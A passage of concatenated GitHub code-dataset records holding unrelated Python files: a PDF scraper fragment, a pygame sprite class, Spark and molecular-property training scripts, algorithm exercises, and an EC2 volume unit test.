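# caution (editor note): get_and_rename_downLoaded_file_name is declared as\n        # (new_name_file, download_path, waitTime=20), so the call below appears to\n        # pass its arguments shuffled; (file_name, file_path, 60) looks like the\n        # intended order.\n        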
#function to wait for the file to be downloaded, locate the file \n # and then rename the file with the expected file name(id)\n self.get_and_rename_downLoaded_file_name(60,file_name,file_path)\n return {base_url : 1} \n #function to close the connection.\n def close_connection(self):\n self.driver.close()\n ","repo_name":"ImanHindi/WebsitePdfFilesScraping","sub_path":"Downloadpdffromwebsites.py","file_name":"Downloadpdffromwebsites.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13400884675","text":"from PIL import Image as PIL_Image\nfrom .image import Image\nfrom .component import Component\nfrom pynegin.conf import HOME\nimport pathlib\n\nclass Sprite(Component):\n def __init__(self, container, source, size=(32, 32), padding=0, per_row=1, amount=1, animated=False, animation_speed=1.0):\n \"\"\"container -> Component: parent Component of Sprite\n source -> str: path to the map (base=assets/)\n size -> tuple(int): size of single sprite\n padding -> int: padding between two sprites\n per_row -> int: amount of sprites per row\n amount -> int: total amount of sprites\n animated -> bool: do animation by default (e.g. fire)\n animation_speed -> float: seconds between animation\n \"\"\"\n\n self.container = container\n self.source = source\n self.size = size\n self.padding = padding\n self.per_row = per_row\n self.amount = amount\n self.animated = animated\n self.animation_speed = animation_speed\n self.current = 0\n\n path = pathlib.Path(HOME)\n ass_path = path.joinpath(\"assets/\")\n path = str(ass_path.joinpath(source))\n\n spriteMap = PIL_Image.open(path)\n self.sprites = []\n\n rows = round(amount / per_row)\n total_height = (rows + padding) * size[1]\n total_width = (per_row + padding) * size[0]\n for row in range(padding, total_height-size[1], padding+size[1]):\n for sp in range(padding, total_width-size[0], padding+size[0]):\n sprite = spriteMap.crop( (sp, row, sp+size[0], row+size[1]) )\n self.sprites.append( Image(container, None, fromString=True, PIL_img=sprite) )\n\n self.surface = self.sprites[0].surface\n self.rect = self.sprites[0].rect\n\n super().__init__(container, size=size, surface=self.surface)\n\n\n def show(self, surf):\n self._update()\n self.sprites[self.current].show(surf)\n\n def _update(self):\n self.rect = self.sprites[self.current].rect\n\n def center(self):\n self.centerHorizontal()\n self.centerVertical()\n\n def centerHorizontal(self):\n for sprite in self.sprites:\n sprite.centerHorizontal()\n\n def centerVertical(self):\n for sprite in self.sprites:\n sprite.centerVertical()\n\n def moveHorizontal(self, distance):\n for sprite in self.sprites:\n sprite.moveHorizontal(distance)\n\n def moveVertical(self, distance):\n for sprite in self.sprites:\n sprite.moveVertical(distance)\n\n def fitToScreen(self, window):\n for sprite in self.sprites:\n sprite.fitToScreen(window)\n\n def resize(self, size):\n for sprite in self.sprites:\n sprite.resize(size)\n\n def next(self):\n self.current = (self.current + 1) % len(self.sprites)\n\n def select(self, s):\n self.current = s % len(self.sprites)\n","repo_name":"wilfreddv/pynegin","sub_path":"pynegin/components/sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"70967446249","text":"from sparktorch import serialize_torch_obj, SparkTorch\nfrom pyspark.sql import SparkSession\nfrom 
model import UNet\nfrom loss import soft_dice_loss\nimport torch\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.pipeline import Pipeline\n\ndata_train_path = '/home/deepak/Courseworks/CS505_Big_Data/Project/mit_100x64x64.csv'\n\nspark = SparkSession.builder.appName(\"UNet\").master('local[2]').getOrCreate()\n\nnetwork = UNet(1)\n\ntorch_obj = serialize_torch_obj(\n    model=network,\n    criterion=soft_dice_loss,\n    optimizer=torch.optim.Adam,\n    lr=0.0001\n)\n\nspark_model = SparkTorch(\n    inputCol='features',\n    labelCol='labels',\n    predictionCol='predictions',\n    torchObj=torch_obj,\n    iters=10,\n    verbose=1\n)\n\nprint(\"Ran successfully\")\n\ndata_train = spark.read.option(\"inferSchema\",\"true\").option(\"maxColumns\",64*64*4).csv(data_train_path)\n\nfeatures_size = 64*64*3\nva1 = VectorAssembler(inputCols=data_train.columns[:features_size],\n                      outputCol='features')\nva2 = VectorAssembler(inputCols=data_train.columns[features_size:],\n                      outputCol='labels')\n\np = Pipeline(stages=[va1, va2, spark_model]).fit(data_train)\np.save('unet')\n","repo_name":"deepaks2112/RoadDetectionSpark","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21776183433","text":"from abc import ABC\n\nfrom config import ConfigPackageProvider\n\n\nclass BaseTracker(ConfigPackageProvider, ABC):\n    \"\"\"\n    A Tracker which tracks some value from a given input.\n    \"\"\"\n\n    def __init__(self, config):\n        # validate config\n        if self not in config:\n            raise RuntimeError('Necessary Package Provider is not in current Config!')\n\n        self.input = None\n        self.tracked_data = None\n","repo_name":"Mirevi/face-synthesizer-JVRB","sub_path":"tracking/base_tracker.py","file_name":"base_tracker.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"344383257","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 9 20:45:26 2021\n\n@author: 曾睿恩\n\"\"\"\n\n \na=int(input(\"How many elevator rides: \"))\nb=0  # accumulated cost of upward travel (20 per floor)\nc=0  # accumulated cost of downward travel (10 per floor)\ne=0\ns=1  # current floor, starting from 1\nfor i in range(a):\n    n=int(input(\"\"))\n    if n>s:\n        up=(n-s)*20\n        b=b+up  # fixed: was b=b+d, which added a constant 0 and dropped every upward fare\n        s=n\n    elif n<s:\n        e=(s-n)*10\n        c=c+e\n        s=n\nfee=c+b\nprint(fee) ","repo_name":"c109156126/h","sub_path":"40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35210519601","text":"import argparse\n\nimport ijson\nfrom tqdm import tqdm\nfrom collections import Counter\nfrom sklearn.metrics import mutual_info_score\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef get_label_dictionary(file):\n    f = open(file, encoding=\"utf8\", errors='ignore')\n    objects = ijson.items(f, 'articles.item')\n    all_label = []\n    label_id = []\n    for obj in tqdm(objects):\n        try:\n            original_label = obj[\"meshMajor\"]\n            mesh_id = obj['meshId']\n            all_label.append(original_label)\n            label_id.append(mesh_id)\n        except AttributeError:\n            print(obj[\"pmid\"].strip())\n\n    occurrence_counts = dict(Counter(x for labels in all_label for x in labels))\n    return occurrence_counts\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--train_json')\n    parser.add_argument('--test_json')\n    parser.add_argument('--save')\n    args = parser.parse_args()\n\n    train_counts = get_label_dictionary(args.train_json)\n    test_counts = get_label_dictionary(args.test_json)\n\n    train = []\n    test = []\n    for k in 
sorted(train_counts.keys() & test_counts.keys()):\n        train.append(train_counts[k])\n        test.append(test_counts[k])\n\n    train = [x / len(train_counts.keys()) for x in train]\n    test = [x / len(test_counts.keys()) for x in test]\n\n    mutual_score = mutual_info_score(train, test)\n    print('mutual score:', mutual_score)\n\n    def KL(a, b):\n        a = np.asarray(a, dtype=float)  # fixed: np.float was removed in NumPy 1.24; use the builtin\n        b = np.asarray(b, dtype=float)\n\n        return np.sum(np.where(a != 0, a * np.log(a / b), 0))\n\n    kl = KL(train, test)  # renamed so the result does not shadow the KL function\n    print('KL distance: ', kl)\n    # plots\n    # less_than_100 = []\n    # between_100_and_500 = []\n    # between_500_and_1000 = []\n    # between_1000_and_5000 = []\n    # grater_than_5000 = []\n    # for key in occurrence_counts.keys():\n    #     if occurrence_counts.get(key) < 100:\n    #         less_than_100.append(key)\n    #     elif 100 <= occurrence_counts.get(key) < 500:\n    #         between_100_and_500.append(key)\n    #     elif 500 <= occurrence_counts.get(key) < 1000:\n    #         between_500_and_1000.append(key)\n    #     elif 1000 <= occurrence_counts.get(key) < 5000:\n    #         between_1000_and_5000.append(key)\n    #     elif occurrence_counts.get(key) >= 5000:\n    #         grater_than_5000.append(key)\n    #\n    # mesh_demographic = {'less_than_100': len(less_than_100),\n    #                     'between_100_and_500': len(between_100_and_500),\n    #                     'between_500_and_1000': len(between_500_and_1000),\n    #                     'between_1000_and_5000': len(between_1000_and_5000),\n    #                     'grater_than_5000': len(grater_than_5000)\n    #                     }\n    # mesh_range = list(mesh_demographic.keys())\n    # numbers = list(mesh_demographic.values())\n    #\n    # fig = plt.figure(figsize=(5, 20))\n    #\n    # # creating the bar plot\n    # plt.bar(mesh_range, numbers, color='maroon', width=0.4)\n    #\n    # plt.xlabel(\"MeSH range\")\n    # plt.ylabel(\"Number of MeSH Terms in Each Range\")\n    # plt.title(\"MeSH Demographics\")\n    # plt.savefig(args.save, dpi=400)\n    # plt.show()\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"xdwang0726/KenMeSH","sub_path":"statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
+{"seq_id":"17454776478","text":"'''\n<Problem>\nYou are a programmer developing a Mars exploration rover.\nHowever, energy sources are hard to find on Mars.\nSo, to use energy efficiently, the rover must be built to always find the optimal path when it moves from the start point to the goal point.\n\nThe space the rover operates in is a 2D grid of size N x N, and each cell has a cost (energy consumption) for passing through it.\nWrite a program that prints the minimum cost of moving from the top-left cell [0][0] to the bottom-right cell [N - 1][N - 1].\nThe rover can move one cell at a time to an adjacent cell: up, down, left, or right.\n\n<Input>\nThe first line contains the number of test cases T (1 <= T <= 10).\nThe first line of each test case contains an integer N, the size of the exploration space.\n2 <= N <= 125\nThe next N lines contain the cost of each cell, separated by spaces.\n0 <= cost of each cell <= 9\n<Output>\nFor each test case, print the minimum cost of moving from [0][0] to [N - 1][N - 1], one per line.\n<Test cases>\nSample input\n\n3 \n3 \n5 5 4 \n3 9 1 \n3 2 7 \n5 \n3 7 2 0 1 \n2 8 0 9 1 \n1 2 1 8 1 \n9 8 9 2 0 \n3 6 5 1 5 \n7 \n9 0 5 1 1 5 3 \n4 1 2 1 6 5 3 \n0 7 6 1 6 8 5 \n1 1 7 8 3 2 3 \n9 4 0 7 6 4 1 \n5 8 3 2 4 8 3 \n7 4 8 4 8 3 4\nSample output\n\n20\n19\n36\n'''\n# Studied solution (https://github.com/ndb796/python-for-coding-test/blob/master/17/3.py)\nimport heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)  # use 1 billion as \"infinity\"\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n# repeat for every test case\nfor tc in range(int(input())):\n    # read the number of nodes\n    n = int(input())\n\n    # read the full map\n    graph = []\n    for i in range(n):\n        graph.append(list(map(int, input().split())))\n\n    # initialize the shortest-distance table to infinity\n    distance = [[INF] * n for _ in range(n)]\n\n    x, y = 0, 0  # the start position is (0, 0)\n    # the cost of reaching the start node is the value at (0, 0); push it onto the queue\n    q = [(graph[x][y], x, y)]\n    distance[x][y] = graph[x][y]\n\n    # run Dijkstra's algorithm\n    while q:\n        # pop the node with the smallest distance so far\n        dist, x, y = heapq.heappop(q)\n        # skip if this node has already been processed\n        if distance[x][y] < dist:\n            continue\n        # check the nodes adjacent to the current one\n        for i in range(4):\n            nx = x + dx[i]\n            ny = y + dy[i]\n            # skip positions outside the map\n            if nx < 0 or nx >= n or ny < 0 or ny >= n:\n                continue\n            cost = dist + graph[nx][ny]\n            # if passing through the current node gives a shorter path to the neighbor\n            if cost < distance[nx][ny]:\n                distance[nx][ny] = cost\n                heapq.heappush(q, (cost, nx, ny))\n\n    print(distance[n - 1][n - 1])\n\n\n# Failed attempt\n# A BFS solution has to make greedy choices, so its result cannot be guaranteed to be the shortest distance\n# from collections import deque\n# import sys\n# input = sys.stdin.readline\n# dx = [-1, 0, 1, 0]\n# dy = [0, 1, 0, -1]\n# for test in range(int(input())):\n#     # read the number of nodes\n#     n = int(input())\n\n#     # read the full map\n#     graph = []\n    \n#     for i in range(n):\n#         graph.append(list(map(int, input().split())))\n#     dist = [[0]*n for i in range(n)]\n#     print(graph)\n#     print(dist)\n#     q = deque([[0,0]])\n#     visited=[[0,0]]]\n#     while q:\n#         now = q.popleft()\n#         now_x,now_y = now[0],now[1]\n#         for i in range(4):\n#             pos_x = now_x + dx[i]\n#             pos_y = now_y + dy[i]\n#             if 0<=pos_x<n and 0<= pos_y <n and [pos_x,pos_y] not in visited:\n            \n","repo_name":"apple3285/Programing_training","sub_path":"17-최단_경로/화성_탐성.py","file_name":"화성_탐성.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"72070919207","text":"# Given an integer array nums and an integer k, return the kth largest element in the array. \n# \n# Note that it is the kth largest element in sorted order, not the kth distinct element. \n# \n# \n# \n# Example 1: \n# \n# \n# Input: [3,2,1,5,6,4] and k = 2\n# Output: 5\n# \n# \n# Example 2: \n# \n# \n# Input: [3,2,3,1,2,4,5,5,6] and k = 4\n# Output: 4 \n# \n# \n# \n# Constraints: \n# \n# \n# 1 <= k <= nums.length <= 10⁴ \n# -10⁴ <= nums[i] <= 10⁴ \n# \n# \n# \n# \n# Note: this problem is the same as main-site problem 215: https://leetcode-cn.com/problems/kth-largest-element-in-an-\n# array/ \n# Related Topics: array, divide and conquer, quickselect, sorting, heap (priority queue) 👍 23 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\nfrom typing import List\nimport heapq\n\n\nclass Solution:\n    def findKthLargest(self, nums: List[int], k: int) -> int:\n        \"\"\"\n        Approach 1: min-heap.\n        :param nums:\n        :param k:\n        :return:\n        \"\"\"\n        min_heap = []\n        for num in nums:\n            if len(min_heap) < k:\n                heapq.heappush(min_heap, num)\n            else:\n                if num < min_heap[0]:\n                    continue\n                else:\n                    
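# num is larger than the smallest kept value: evict that minimum and\n                    # admit num, so the heap always holds the k largest seen so far\n                    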
heapq.heappop(min_heap)\n heapq.heappush(min_heap, num)\n return min_heap[0]\n\nclass Good:\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\n def __lt__(self, other):\n if self.price < other.price:\n return True\n elif self.price == other.price:\n return self.name < other.name\n\n\nclass DataBase:\n def __init__(self):\n self.data = []\n\n def add(self, good):\n heapq.heappush(self.data, good)\n # self.data.append((price, name))\n # self.data.sort()\n # print(self.data)\n\n def get(self, idx):\n return self.data[idx].name\n\ndef getitem(entries):\n res = []\n db = DataBase()\n idx =0\n for entry in entries:\n if entry[0] == 'INSERT':\n name, price = entry[1], entry[2]\n good = Good(name, int(price))\n db.add(good)\n elif entry[0] == 'VIEW':\n name = db.get(idx)\n idx += 1\n res.append(name)\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n entries = [['INSERT', 'fries', 4],\n ['INSERT', 'doda', 2],\n ['VIEW'],\n ['VIEW'],\n ['INSERT', 'humb', 5],\n ['VIEW'],\n ['INSERT', 'nuggets', 4],\n ['INSERT', 'cookie', 1],\n ['VIEW'],\n ['VIEW']]\n\n result = getitem(entries)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[剑指 Offer II 076]数组中的第 k 大的数字.py","file_name":"[剑指 Offer II 076]数组中的第 k 大的数字.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15837298271","text":"#filename: chap9_ex4_index_raise.py\n#function: raise exception\n\nMath_Listing=[86,90,78,92,100]\nMath_student_name=[\"Wang Hai\",\"Tsai Cher\",\"Cheng gin-lin\",\"Chang chou sang\",\"Tsai ching-yuan\"]\n\ndef chk_score(data,indexing):\n if indexing >len(data):\n print(\"\\n****Raise Occurs and will raise IndexError\")\n raise IndexError\n else:\n return data[indexing]\n \ntry:\n print(\"The Math score is:\",Math_Listing)\n index=int(input(\"Input the index you want:\"))\n score=chk_score(Math_Listing,index)\n who=Math_student_name[index]\n \nexcept IndexError as e:\n print(\"\\nexception IndexError after calling subprogram chk_score\\n\",type(e))\n raise\nelse:\n print(\"score=\",score, \"\\tStudent:\",who)\nfinally:\n print(\"finally statement\")\n","repo_name":"Scott-S-Lin/Python_Programming_ChineseBook","sub_path":"ch9/exam9-3.py","file_name":"exam9-3.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41627815878","text":"#User function Template for python3\n\ndef reverseWord(s):\n #your code here\n s=[i for i in s]\n def reverse(i,j,s):\n if i>j:\n return\n s[i],s[j]=s[j],s[i]\n reverse(i+1,j-1,s)\n reverse(0,len(s)-1,s)\n return(\"\".join(s))\n \n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == \"__main__\":\n t = int(input())\n while(t>0):\n s = input()\n print(reverseWord(s))\n t = t-1\n\n# } Driver Code Ends","repo_name":"akashprap/Coding-Problems","sub_path":"Basic/Reverse a String/reverse-a-string.py","file_name":"reverse-a-string.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23289668929","text":"import os\nimport time\nimport torch\nimport torch.optim as optim\nimport numpy as np\nimport pickle\n\nfrom enum import Enum\nfrom typing import List, Dict\nfrom functools import reduce\nfrom tqdm import tqdm\nfrom rdkit.Chem import MolToSmiles, 
RemoveAllHs\n\n# from data.geom_qm9.load_qm9 import load_qm9 as load_geom_qm9\nfrom data.qm7.load_qm7 import load_qm7\nfrom data.qm8.load_qm8 import load_qm8\nfrom data.qm9.load_qm9 import load_qm9\nfrom net.baseline.AttentiveFP.AttentiveLayers import Fingerprint\nfrom net.baseline.AttentiveFP.getFeatures import save_smiles_dicts, get_smiles_array\nfrom .config import QM7_CONFIG, QM8_CONFIG\nfrom train.utils.cache_batch import Batch, load_batch_cache, load_encode_mols, batch_cuda_copy\nfrom train.utils.seed import set_seed\nfrom train.utils.loss_functions import multi_mse_loss, multi_mae_loss\nfrom train.utils.save_log import save_log\n\nMODEL_DICT_DIR = 'train/models/AttentiveFP'\n\n\nclass QMDataset(Enum):\n QM7 = 1,\n QM8 = 2,\n\n\ndef train_qm9(special_config: dict = None, dataset=QMDataset.QM7,\n use_cuda=False, max_num=-1, data_name='QM9', seed=0, force_save=False, tag='AttentiveFP-QM9',\n use_tqdm=False):\n # set parameters and seed\n print(f'For {tag}:')\n if dataset == QMDataset.QM7:\n config = QM7_CONFIG.copy()\n else:\n config = QM8_CONFIG.copy()\n if special_config is not None:\n config.update(special_config)\n print('\\t CONFIG:')\n for k, v in config.items():\n print(f'\\t\\t{k}: {v}')\n set_seed(seed, use_cuda=use_cuda)\n np.set_printoptions(suppress=True, precision=3, linewidth=200)\n\n # load dataset\n print('Loading:')\n # mol_list_weight_mol, mol_properties = load_geom_qm9(max_num)\n # mols = [list_weight_mol[0][1] for list_weight_mol in mol_list_weight_mol]\n if dataset == QMDataset.QM7:\n mols, mol_properties = load_qm7(max_num)\n mols = [RemoveAllHs(mol) for mol in mols]\n not_single_mask = [len(mol.GetAtoms()) > 1 for mol in mols]\n mols = [mols[i] for i in range(len(mols)) if not_single_mask[i]]\n mol_properties = mol_properties[not_single_mask, :]\n mols_info = load_encode_mols(mols, name=data_name, force_save=force_save)\n else:\n mols, mol_properties = load_qm8(max_num)\n mols = [RemoveAllHs(mol) for mol in mols]\n not_single_mask = [len(mol.GetAtoms()) > 1 for mol in mols]\n mols = [mols[i] for i in range(len(mols)) if not_single_mask[i]]\n mol_properties = mol_properties[not_single_mask, :]\n mols_info = load_encode_mols(mols, name=data_name, force_save=force_save)\n\n smiles_list = [MolToSmiles(m) for m in mols]\n feature_filename = f'train/AttentiveFP/{data_name}.pickle'\n filename = f'train/AttentiveFP/{data_name}'\n if os.path.isfile(feature_filename):\n feature_dicts = pickle.load(open(feature_filename, \"rb\"))\n else:\n feature_dicts = save_smiles_dicts(smiles_list, filename)\n\n # normalize properties and cache batches\n mean_p = np.mean(mol_properties, axis=0)\n stddev_p = np.std((mol_properties - mean_p).tolist(), axis=0, ddof=0)\n weights = torch.tensor(stddev_p ** 2, dtype=torch.float32) * 500\n if use_cuda:\n weights = weights.cuda()\n norm_p = (mol_properties - mean_p) / stddev_p\n print(f'\\tmean: {mean_p}')\n print(f'\\tstd: {stddev_p}')\n # print(f'\\tmad: {mad_p}')\n if dataset == QMDataset.QM8:\n print(f'\\tweights: {weights.cpu().numpy()}')\n print('Caching Batches...')\n try:\n batch_cache = load_batch_cache(data_name, mols, mols_info, norm_p, batch_size=config['BATCH'],\n contains_ground_truth_conf=False, need_mask_matrices=False,\n use_cuda=use_cuda, use_tqdm=use_tqdm, force_save=force_save)\n except EOFError:\n batch_cache = load_batch_cache(data_name, mols, mols_info, norm_p, batch_size=config['BATCH'],\n contains_ground_truth_conf=False, need_mask_matrices=False,\n use_cuda=use_cuda, use_tqdm=use_tqdm, force_save=True)\n\n # build 
model\n print('Building Models...')\n model = Fingerprint(\n radius=config['RADIUS'],\n T=config['T'],\n input_feature_dim=39,\n input_bond_dim=10,\n fingerprint_dim=config['DIM'],\n output_units_num=mol_properties.shape[1],\n p_dropout=config['DROPOUT']\n )\n if use_cuda:\n model.cuda()\n\n # initialize optimization\n parameters = list(model.parameters())\n optimizer = optim.Adam(params=parameters, lr=config['LR'], weight_decay=config['DECAY'])\n scheduler = optim.lr_scheduler.StepLR(optimizer=optimizer, step_size=1, gamma=config['GAMMA'])\n print('##### Parameters #####')\n\n param_size = 0\n for name, param in model.named_parameters():\n print(f'\\t\\t{name}: {param.shape}')\n param_size += reduce(lambda x, y: x * y, param.shape)\n print(f'\\tNumber of parameters: {param_size}')\n\n # train\n epoch = 0\n logs: List[Dict[str, float]] = []\n best_epoch = 0\n best_metric = 999\n try:\n if not os.path.exists(MODEL_DICT_DIR):\n os.mkdir(MODEL_DICT_DIR)\n except FileExistsError:\n pass\n\n def train(batches: List[Batch], masks: List[List[int]]):\n model.train()\n optimizer.zero_grad()\n n_batch = len(batches)\n if use_tqdm:\n batches = tqdm(batches, total=n_batch)\n for mask, batch in zip(masks, batches):\n if use_cuda:\n batch = batch_cuda_copy(batch)\n temp_smiles_list = [smiles_list[iii] for iii in mask]\n x_atom, x_bonds, x_atom_index, x_bond_index, x_mask, smiles_to_rdkit_list = get_smiles_array(\n temp_smiles_list, feature_dicts)\n if use_cuda:\n _, pred_p = model.forward(torch.Tensor(x_atom).cuda(), torch.Tensor(x_bonds).cuda(),\n torch.cuda.LongTensor(x_atom_index),\n torch.cuda.LongTensor(x_bond_index), torch.Tensor(x_mask).cuda())\n else:\n _, pred_p = model.forward(torch.Tensor(x_atom), torch.Tensor(x_bonds),\n torch.LongTensor(x_atom_index),\n torch.LongTensor(x_bond_index), torch.Tensor(x_mask))\n if dataset == QMDataset.QM8:\n p_losses = multi_mse_loss(pred_p, batch.properties, explicit=True)\n p_loss = sum(p_losses * weights)\n else:\n p_loss = multi_mse_loss(pred_p, batch.properties)\n loss = p_loss\n loss.backward()\n optimizer.step()\n\n def evaluate(batches: List[Batch], masks: List[List[int]], batch_name: str) -> float:\n model.eval()\n optimizer.zero_grad()\n n_batch = len(batches)\n list_p_loss = []\n list_loss = []\n list_p_multi_mae = []\n list_p_total_mae = []\n if use_tqdm:\n batches = tqdm(batches, total=n_batch)\n for mask, batch in zip(masks, batches):\n if use_cuda:\n batch = batch_cuda_copy(batch)\n temp_smiles_list = [smiles_list[iii] for iii in mask]\n x_atom, x_bonds, x_atom_index, x_bond_index, x_mask, smiles_to_rdkit_list = get_smiles_array(\n temp_smiles_list, feature_dicts)\n if use_cuda:\n _, pred_p = model.forward(torch.Tensor(x_atom).cuda(), torch.Tensor(x_bonds).cuda(),\n torch.cuda.LongTensor(x_atom_index),\n torch.cuda.LongTensor(x_bond_index), torch.Tensor(x_mask).cuda())\n else:\n _, pred_p = model.forward(torch.Tensor(x_atom), torch.Tensor(x_bonds),\n torch.LongTensor(x_atom_index),\n torch.LongTensor(x_bond_index), torch.Tensor(x_mask))\n if dataset == QMDataset.QM8:\n p_losses = multi_mse_loss(pred_p, batch.properties, explicit=True)\n p_loss = sum(p_losses * weights)\n else:\n p_loss = multi_mse_loss(pred_p, batch.properties)\n loss = p_loss\n list_p_loss.append(p_loss.cpu().item())\n list_loss.append(loss.cpu().item())\n\n p_multi_mae = multi_mae_loss(pred_p, batch.properties, explicit=True)\n p_total_mae = p_multi_mae.sum()\n list_p_multi_mae.append(p_multi_mae.cpu().detach().numpy())\n list_p_total_mae.append(p_total_mae.cpu().item())\n\n 
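# the prints below average the accumulated per-batch sums over n_batch;\n        # multiplying the normalized MAE by stddev_p converts it back to the\n        # original property units (properties were standardized further up)\n        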
print(f'\\t\\t\\tP LOSS: {sum(list_p_loss) / n_batch}')\n print(f'\\t\\t\\tTOTAL LOSS: {sum(list_loss) / n_batch}')\n print(f'\\t\\t\\tPROPERTIES MULTI-MAE: {sum(list_p_multi_mae) * stddev_p / n_batch}')\n if dataset == QMDataset.QM8:\n total_mae = np.sum(sum(list_p_multi_mae) * stddev_p / n_batch)\n else:\n total_mae = sum(list_p_total_mae) / n_batch\n print(f'\\t\\t\\tPROPERTIES TOTAL MAE: {total_mae}')\n logs[-1].update({\n f'{batch_name}_p_loss': sum(list_p_loss) / n_batch,\n f'{batch_name}_loss': sum(list_loss) / n_batch,\n f'{batch_name}_p_metric': total_mae,\n f'{batch_name}_multi_p_metric': list(sum(list_p_multi_mae) * stddev_p / n_batch),\n })\n return sum(list_p_total_mae) / n_batch\n\n for _ in range(config['EPOCH']):\n epoch += 1\n t0 = time.time()\n\n logs.append({'epoch': epoch})\n print()\n print(f'##### IN EPOCH {epoch} #####')\n print('\\tCurrent LR: {:.3e}'.format(optimizer.state_dict()['param_groups'][0]['lr']))\n print('\\t\\tTraining:')\n train(batch_cache.train_batches, batch_cache.train_masks)\n print('\\t\\tEvaluating Train:')\n evaluate(batch_cache.train_batches, batch_cache.train_masks, 'train')\n print('\\t\\tEvaluating Validate:')\n m = evaluate(batch_cache.validate_batches, batch_cache.validate_masks, 'validate')\n print('\\t\\tEvaluating Test:')\n evaluate(batch_cache.test_batches, batch_cache.test_masks, 'test')\n scheduler.step(epoch)\n\n t1 = time.time()\n print('\\tProcess Time: {}'.format(int(t1 - t0)))\n logs[-1].update({'process_time': t1 - t0})\n\n if m < best_metric:\n best_metric = m\n best_epoch = epoch\n print(f'\\tSaving Model...')\n torch.save(model.state_dict(), f'{MODEL_DICT_DIR}/{tag}-model.pkl')\n logs[-1].update({'best_epoch': best_epoch})\n save_log(logs,\n directory='QM7' if dataset == QMDataset.QM7\n else 'QM8' if dataset == QMDataset.QM8\n else 'QM9',\n tag=tag)\n","repo_name":"PKUterran/PhysChem","sub_path":"train/AttentiveFP/train_qm9.py","file_name":"train_qm9.py","file_ext":"py","file_size_in_byte":10817,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"294677328","text":"from unittest import TestCase\n\nimport boto3\nfrom moto import mock_ec2\n\nfrom altimeter.aws.resource.ec2.volume import EBSVolumeResourceSpec\nfrom altimeter.aws.scan.aws_accessor import AWSAccessor\nfrom altimeter.aws.scan.settings import ALL_RESOURCE_SPEC_CLASSES\nfrom altimeter.core.graph.links import LinkCollection, ResourceLink, SimpleLink\nfrom altimeter.core.resource.resource import Resource\n\n\nclass TestEBSVolumeResourceSpec(TestCase):\n @mock_ec2\n def test_scan(self):\n account_id = \"123456789012\"\n region_name = \"us-east-1\"\n\n session = boto3.Session()\n\n ec2_client = session.client(\"ec2\", region_name=region_name)\n resp = ec2_client.create_volume(Size=1, AvailabilityZone=\"us-east-1a\")\n create_time = resp[\"CreateTime\"]\n created_volume_id = resp[\"VolumeId\"]\n created_volume_arn = f\"arn:aws:ec2:us-east-1:123456789012:volume/{created_volume_id}\"\n\n scan_accessor = AWSAccessor(session=session, account_id=account_id, region_name=region_name)\n resources = EBSVolumeResourceSpec.scan(\n scan_accessor=scan_accessor,\n all_resource_spec_classes=ALL_RESOURCE_SPEC_CLASSES,\n )\n\n expected_resources = [\n Resource(\n resource_id=created_volume_arn,\n type=\"aws:ec2:volume\",\n link_collection=LinkCollection(\n simple_links=(\n SimpleLink(pred=\"availability_zone\", obj=\"us-east-1a\"),\n SimpleLink(pred=\"create_time\", obj=create_time),\n SimpleLink(pred=\"size\", obj=True),\n 
SimpleLink(pred=\"state\", obj=\"available\"),\n SimpleLink(pred=\"volume_type\", obj=\"gp2\"),\n SimpleLink(pred=\"encrypted\", obj=False),\n ),\n resource_links=(\n ResourceLink(pred=\"account\", obj=\"arn:aws::::account/123456789012\"),\n ResourceLink(pred=\"region\", obj=\"arn:aws:::123456789012:region/us-east-1\"),\n ),\n ),\n )\n ]\n self.assertEqual(resources, expected_resources)\n","repo_name":"tableau/altimeter","sub_path":"tests/unit/altimeter/aws/resource/ec2/test_volume.py","file_name":"test_volume.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"39631636822","text":"import tensorflow as tf\n\n\nclass PaddedBinaryCrossentropyLoss(tf.keras.losses.Loss):\n def __init__(self, smoothing=0.):\n super(PaddedBinaryCrossentropyLoss, self).__init__()\n self.smoothing = smoothing\n\n def call(self, y_true, y_pred):\n y_true = tf.cast(y_true, dtype='float32')\n weights 